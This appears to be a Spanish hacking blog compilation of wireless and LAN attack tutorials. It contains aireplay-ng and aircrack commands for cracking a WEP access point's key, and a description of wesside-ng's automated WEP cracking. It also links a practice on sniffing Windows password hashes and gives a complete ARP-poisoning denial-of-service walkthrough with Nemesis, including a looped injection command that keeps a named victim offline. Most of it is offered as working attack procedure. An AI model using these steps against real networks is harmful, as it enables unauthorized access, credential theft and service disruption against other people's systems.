Inyección ipw3945 en Wifiway 0.6 & 0.8

Para aquellos que no podiamos inyectar con nuestra ipw3945 aqui les dejo una muy buena info, para lograrlo.

Primero modificar el rate de nuestra tarjeta y canal adaptandolo al que corresponda con el ap

Ejecutamos desde la terminal

./ipw3945

Nos pedirá el canal, rate, bssid

hecho esto podremos inyectar, pero hay un detalle para capturar usaremos la rtap0 y para inyectar la interfaz wifi0

La inyección se hace de la siguiente forma

airodump-ng rtap0

Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego tenemos que abrir otra terminal y con el aireplay-ng hacemos lo que sigue:

aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0

 

Y en otra terminal distinta hacemos lo siguiente:

aireplay-ng -3 -b mac_del_ap -h mi_mac wifi0

Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:

airodump-ng rtap0

Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es;

aircrack-ptw archivo.cap

Yo acabo de testear con mi red y me funciono de maravilla.

WifiZoo

WifiZoo es una herramienta para recopilar información wifi pasivamente. Es creado para ser útil en pentesting wifi y se inspiró en “Ferret ‘de erratas

La herramienta está destinada a obtener toda la información posible de las redes wifi abiertas y posiblemente también cifrada en el futuro, al menos, con WEP, sin unirse a ninguna red, y que abarque todos los canales wifi.

Puede descargar aquí WifiZoo v1.3:

wifizoo_v1.3.tgz wifizoo_v1.3.tgz

o si kieres pueden bajar la live cd de Backtrack 3 que ya incluye esta y muchas mas herramientas.

aqui tambien les dejo un video donde muestra el funcionamiento de esta aplicacion.

http://www.mediafire.com/?ekg9qehzmzz

Wesside-ng rompiendo WEP en 1 Minuto

YA VIENE INTEGRADA EN LA LIVEE CD DE BACKTRACK 3. AQUI LES DEJO UN VIDEO QUE MUESTA EL FUNCIONAMIENTO DE ESTA HERRAMIENTA COMO TAMBIEN TECNICAS DE SIDEJACKING. CLICK EN EL ENLACE DE ABAJO

http://www.ethicalhacker.net/content/view/167/2/

Descripción:

Wesside-ng es una utilidad “auto-mágica” que incorpora todas las técnicas para obtener fácilmente una clave WEP en pocos minutos. Primero identifica una red wireless, seguidamente procede a asociarse a la misma, obtiene un PRGA (pseudo random generation algorithm) xor data, determina el rango de IPs de la red, reinyecta una respuesta ARP y finalmente determina la clave WEP. Todo esto lo hace sin ninguna intervención por tu parte.

La utilidad wesside original fue creada por Andrea Bittau y fue un programa que acompañaba a 2 artículos publicados. Estos artículos son “El ataque de Fragmentación en la práctica” por Andrea Bittau y “El último descubrimiento para enterrar las redes con clave WEP” por Andrea Bittau, Mark Handley y Josua Lockey. Miralinks page para ver estos artículos y muchos otros más. Estos artículos proporcionan excelente información para comprender los métodos usados para obtener claves WEP. Los conceptos para el ataque de fragmentación incorporado en aircrack-ng se han obtenido de esos artículos.

¿Quién sabe de donde viene el nombre del programa “wesside”? Proviene de “tupac the rapper” (2Pac / Tupac Shakur).

Wesside-ng ha sido actualizado para incluir los nuevos avances para obtener claves WEP. Los pasos que lleva a cabo wesside-ng son:

1. Va saltando de canal buscando una red wireless con clave WEP.
2. Una vez que encuentra una red, intenta autenticarse. Si la autenticación falla, entonces el programa intenta encontrar una dirección MAC que se haya asociado con el AP para engañarlo.
3. Una vez que el programa se ha autenticado satisfactóriamente intenta asociarse con el AP.
4. Despues de snifar un simple paquete de datos, procede a descubrir los 128 bytes de un PRGA enviando paquetes “broadcasts” e interceptando los paquetes de respuesta. Esto es lo que se conoce como ataque de fragmentación. El PRGA se escribe en el archivo prga.log.
5. Despues esnifa un “ARP request” y desencripta la dirección IP usando la técnica “linear keystream expansion”. Esto se usa para construir la petición ARP que se usará para la inyección.
6. Inunda la red con peticiones ARP para esa dirección IP.
7. Lanza el aircrack-ng PTW attack para determinar la clave WEP.

Mas informacion en:

http://www.aircrack-ng.org/doku.php?id=wesside-ng.es

Obtener la contraseña de Windows de un usuario de nuestra red local.

TEORIA:

El equipo atacante coloca un Sniffer a la escucha, de forma que es capaz de capturar todo el tráfico que pasa por su tarjeta de red. Cuando un usuario víctima inicia sesión en el equipo atacante para acceder a sus recursos compartidos, el Sniffer captura el hash desafío-respuesta intercambiado y después de crackearlo por fuerza bruta, se obtiene la contraseña de Windows del usuario víctima que inició sesión en el equipo atacante. 

 http://www.geocities.com/unrayodesoul/gospel/Practica.2.Sniffar.Password.Windows.byGospel.pdf

 

 

http://www.geocities.com/unrayodesoul/gospel/Practica.2.Sniffar.Password.Windows.byGospel.pdf

Negación de servicios de Internet a otro equipo de la red local

Aqui les dejo una practica que encontre en la red para impedir que un equipo de una red se conecte a internet.

Teoría:El equipo víctima accede a Internet a través del router. Y a su vez, accede al router pq conoce su dirección IP, q es traducida a dirección MAC a través del protocolo ARP. Por tanto, en última instancia, el equipo víctima accede a Internet mandando paquetes hacia la dirección MAC del router. Si el equipo atacante logra engañar al equipo víctima, haciendole creer q la dirección MAC del router es otra inexistente, el equipo víctima no podrá llegar al router, esto es, no podrá llegar a Internet. Para llevar esto a cabo, el equipo atacante debe enviar un paquete malicioso suplantando la identidad del router y diciéndole al equipo víctima q debe actualizar su tabla ARP con la nueva dirección MAC inexistente.

Aplicación práctica:

Envenenamiento ARP

Escenario:

Atacante: 10.10.0.69
Víctima: 10.10.0.254
Router / Puerta de Enlace: 10.10.0.33

Herramientas:

Vamos a utilizar el inyector de paquetes Némesis @ http://www.packetfactory.net/projects/nemesis/
Más información sobre Nemesis en http://foro.elhacker.net/index.php/topic,33197.0.html

Procedimiento:

1º Obtener las direcciones MACs de los equipos víctima y router a través de sus direcciones IP. Para ello, hacemos un ping a ambos equipos.

2º Obtener la tabla caché ARP de direcciones IP/MAC en el equipo atacante. Esto se hace a través del comando arp -a

Citar

C:\>arp -a

Interfaz: 10.10.0.69 — 0×2
  Dirección IP          Dirección física      Tipo
  10.10.0.33            00-c0-49-44-b1-d5     dinámico
  10.10.0.254           00-20-18-b0-06-df     dinámico

C:\>

3º Obtener la tabla caché ARP de direcciones IP/MAC en el equipo víctima. Esto es lo q supuestamente ocurriría en el equipo víctima…

Citar

C:\WINDOWS\system32>arp -a

Interfaz: 10.10.0.254 — 0×2
  Dirección IP          Dirección física      Tipo
  10.10.0.33            00-c0-49-44-b1-d5     dinámico
  10.10.0.69            00-05-1c-0a-ab-92     dinámico
 
C:\WINDOWS\system32>

4º Verificar que la víctima tiene conexión a Internet. Esto es lo q supuestamente ocurriría en el equipo víctima…

Citar

C:\WINDOWS\system32>ping www.google.es -t

Haciendo ping a www.google.akadns.net [66.102.11.99] con 32 bytes de datos:

Respuesta desde 66.102.11.99: bytes=32 tiempo=93ms TTL=241
Respuesta desde 66.102.11.99: bytes=32 tiempo=113ms TTL=237
Respuesta desde 66.102.11.99: bytes=32 tiempo=110ms TTL=237
etc.

5º Inyectar desde el atacante el paquete malicioso que envenena la tabla caché ARP de la víctima con la MAC errónea del router.

Sintaxis de la inyección: nemesis arp -D IPvictima -S IProuter -H MACrouter

Citar

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>

6º Obtener la tabla caché ARP de direcciones IP/MAC envenenada en el equipo víctima. Esto es lo q supuestamente ocurriría en el equipo víctima…

Citar

C:\WINDOWS\system32>arp -a

Interfaz: 10.10.0.254 — 0×2
  Dirección IP          Dirección física      Tipo
  10.10.0.33            aa-bb-cc-dd-ee-ff     dinámico
  10.10.0.69            00-05-1c-0a-ab-92     dinámico
 
C:\WINDOWS\system32>

7º Verificar que la víctima NO tiene conexión a Internet. Esto es lo q supuestamente ocurriría en el equipo víctima…

Citar

C:\WINDOWS\system32>ping www.google.es -t

Haciendo ping a www.google.akadns.net [66.102.11.99] con 32 bytes de datos:

Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Respuesta desde 66.102.11.99: bytes=32 tiempo=112ms TTL=238
etc.

Como podéis observar, después de cierto tiempo, el sistema Windows de la víctima refrescará su tabla caché ARP con la verdadera dirección MAC del router y, entonces, sí que dispondrá de conexión Internet. Se fastidió el invento?? Noooo… si estamos continua y periódicamente envenenando la tabla caché ARP de la víctima desde el equipo atacante.
Para ello, inyectamos el paquete con Nemesis desde un bucle FOR:

Citar

C:\>FOR /L %i IN (1,1,5000) DO nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

etc.

De esta forma, la víctima no dispondrá de conexión a Internet mientras dure el bucle FOR del atacante…